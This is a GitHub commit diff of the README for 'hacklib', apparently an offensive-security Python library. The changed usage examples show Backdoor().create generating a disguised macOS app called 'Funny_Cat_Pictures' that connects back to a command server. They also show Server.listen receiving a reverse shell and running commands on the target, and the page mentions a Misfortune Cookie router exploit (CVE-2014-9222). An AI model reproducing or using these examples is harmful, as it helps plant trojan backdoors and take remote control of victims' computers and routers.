Skip to content

Commit 3a16c05

Browse files
committed
2 parents 4f2e7a9 + b30c56f commit 3a16c05

File tree

1 file changed

+6
-3
lines changed

1 file changed

+6
-3
lines changed

README.md

Lines changed: 6 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -52,13 +52,16 @@ bd = hacklib.Backdoor()
5252
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
5353
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
5454
```
55+
Generated App:
56+
57+
![Screenshot](http://i.imgur.com/BsBzCWA.png)
5558

5659
Listen for connections with Server:
5760
```python
5861
>>> import hacklib
59-
>>> s = hacklib.Server(9091) # Bind server to port 9091
62+
>>> s = hacklib.Server(9090) # Bind server to port 9090
6063
>>> s.listen()
61-
New connection ('127.0.0.1', 50011) # Prints this when a computer connects
64+
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
6265
bash: no job control in this shell
6366
bash$ whoami # Type a command
6467
leon
@@ -120,7 +123,7 @@ Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:
120123
>>> ps = hacklib.PortScanner()
121124
>>> ps.scan('192.168.1.1', (80, 81))
122125
Port 80:
123-
HTTP/1.1 404 Not Found
126+
HTTP/1.1 200
124127
Content-Type: text/html
125128
Transfer-Encoding: chunked
126129
Server: RomPager/4.07 UPnP/1.0

0 commit comments

Comments
 (0)